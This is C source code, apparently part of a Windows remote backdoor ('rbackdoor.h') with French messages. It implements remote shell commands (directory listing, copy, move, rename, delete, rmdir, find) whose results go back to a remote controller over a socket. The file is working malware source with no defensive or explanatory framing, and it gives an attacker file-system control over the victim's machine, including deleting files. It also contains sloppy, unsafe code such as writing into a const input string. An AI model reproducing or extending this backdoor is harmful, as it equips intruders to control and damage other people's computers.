#include "rbackdoor.h"

/*************************************************************/
/* Shell Command: dir                                        */
/*************************************************************/

void Proc_Dir(LPCTSTR file)
{
	WIN32_FIND_DATA wData;
	char nom[MAX_PATH], *buf, *path;
	HANDLE listing;
	int r=0, f=0;
	
	buf = (char *)GlobalAlloc(GPTR, 256);
	path = (char *)GlobalAlloc(GPTR, 256);

	if(strlen(file)>2)
		sprintf(buf, "\n\tRepertoire de : %s\n\n", file);
	else {
		_getcwd(path, 256);
		sprintf(buf, "\n\tRepertoire de : %s\n\n", path);
	}
	rsend(ConnectSocket, buf);
	GlobalFree(path);
	strcat((char *)file, "*.*");
	listing = FindFirstFile(file, &wData);
	
	while((FindNextFile(listing, &wData)))
	{
		strcpy(nom, wData.cFileName);
		if(wData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
			rsend(ConnectSocket, "<REP>");
			r++;
		}
		else  {
			sprintf(buf, "\t%d", wData.nFileSizeHigh*MAXDWORD+wData.nFileSizeLow);
			rsend(ConnectSocket, buf);
			f++;
		}
		rsend(ConnectSocket, "\t");
		rsend(ConnectSocket, nom);
		rsend(ConnectSocket, "\n");
	}
	sprintf(buf, "\t\t %d Fichier(s) \n\t\t %d Rep(s)", f, r);
	rsend(ConnectSocket, buf);
	GlobalFree(buf);
}

/*************************************************************/
/* Shell Command: pwd                                        */
/*************************************************************/

int pwd(void)
{
	char *buffer;
	
	buffer = (char *)GlobalAlloc(GPTR, 1024);
	
	if(_getcwd(buffer, 1024)==NULL)
	{
		rsend(ConnectSocket, "Error: Erreur lors de la recuperation du repertoire courant\n");
		return(-1);
	}
	else rsend(ConnectSocket, buffer);
	rsend(ConnectSocket, "\n");
	GlobalFree(buffer);
	return(0);
}

/*************************************************************/
/* Shell Command: md                                         */
/*************************************************************/

int Proc_CreateDir(char *dir)
{
	unsigned int err;
	
	if(strlen(dir) < 1) {
	    Proc_help("md");
		return(-1);
	}
	err = CreateDirectory(dir, NULL);
	if(err==0)
	{
		rsend(ConnectSocket, "Error: Erreur lors de la tentative de creation du repertoire\n");
		return(-1);
	}
	else rsend(ConnectSocket, "msg: Repertoire creer avec succes\n");
	return(0);
}

/*************************************************************/
/* Shell Command: copy                                       */
/*************************************************************/

int Proc_Copy(char *src, char *dest)
{
	unsigned int err;
	
	if(strlen(src) < 1 || strlen(dest) < 1) {
		Proc_help("copy");
		return(-1);
	}
	err = CopyFile(src, dest, FALSE);
	if(err==0)
	{
		rsend(ConnectSocket, "Error: Erreur lors de la tentative de copie du fichier\n");
		return(-1);
	}
	else rsend(ConnectSocket, "msg: Fichier copie avec succes\n");
	return(0);
}

/*************************************************************/
/* Shell Command: del                                        */
/*************************************************************/

int Proc_DeleteFile(char *file)
{
	unsigned int err;
	if(strlen(file) < 1) {
		Proc_help("del");
		return(-1);
	}
	err = DeleteFile(file);
	if(err==0)
	{
		rsend(ConnectSocket, "Error: Erreur lors de la tentative de suppression du fichier\n");
		return(-1);
	}
	else rsend(ConnectSocket, "msg: Fichier efface avec succes\n");
	return(0);
}

/*************************************************************/
/* Shell Command: rmdir                                      */
/*************************************************************/

int Proc_RemoveDir(char *dir)
{
	unsigned int err;
	
	if(strlen(dir) < 1) {
		Proc_help("rmdir");
		return(-1);
	}
	
	err = RemoveDirectory(dir);
	if(err==0)
	{
		rsend(ConnectSocket, "Error: Erreur lors de la tentative de suppression du repertoire\n");
		return(-1);
	}
	else rsend(ConnectSocket, "msg: Repertoire efface avec succes\n");
	return(0);
}

/*************************************************************/
/* Shell Command: move                                       */
/*************************************************************/

int Proc_MoveFile(char *src, char *dest)
{
	unsigned int err;
	
	if(strlen(src) < 1 || strlen(dest) < 1) {
		Proc_help("move");
		return(-1);
	}
	err = MoveFile(src, dest);
	if(err==0)
	{
		rsend(ConnectSocket, "Error: Erreur lors de la tentative de deplacement du fichier\n");
		return(-1);
	}
	else rsend(ConnectSocket, "msg: Fichier deplace avec succes\n");
	return(0);
}

/*************************************************************/
/* Shell Command: ren                                        */
/*************************************************************/

int Proc_RenameFile(char *oldname, char *newname)
{
	unsigned int err;
	if(strlen(oldname) < 1 || strlen(newname) < 1) {
		Proc_help("ren");
		return(-1);
	}
	err = rename(oldname, newname);
	if(err != 0)
	{
		rsend(ConnectSocket, "Error: Erreur lors de la tentative de renommage du fichier\n");
		return(-1);
	}
	else rsend(ConnectSocket, "msg: Fichier renomme avec succes\n");
	return(0);
}

/*************************************************************/
/* Shell Command: clear                                      */
/*************************************************************/

int Proc_Clear()
{
	int i;
	for(i=0; i<50; i++) rsend(ConnectSocket, "\n");
	return(0);
}

/*************************************************************/
/* Shell Command: find                                       */
/*************************************************************/

int Find(char *file)
{
	WIN32_FIND_DATA FileInfo;
	HANDLE hFind;
	
	if(strlen(file) < 1) {
		Proc_help("find");
		return(-1);
	}
	hFind = FindFirstFile(file, &FileInfo) ;
	if (hFind == INVALID_HANDLE_VALUE ) {
		rsend(ConnectSocket, "Fichier non existant");
	}
	else {
		rsend(ConnectSocket, "Fichier trouve : ");
		rsend(ConnectSocket, file);
		FindClose (hFind);
	}
	
	return(0);
}

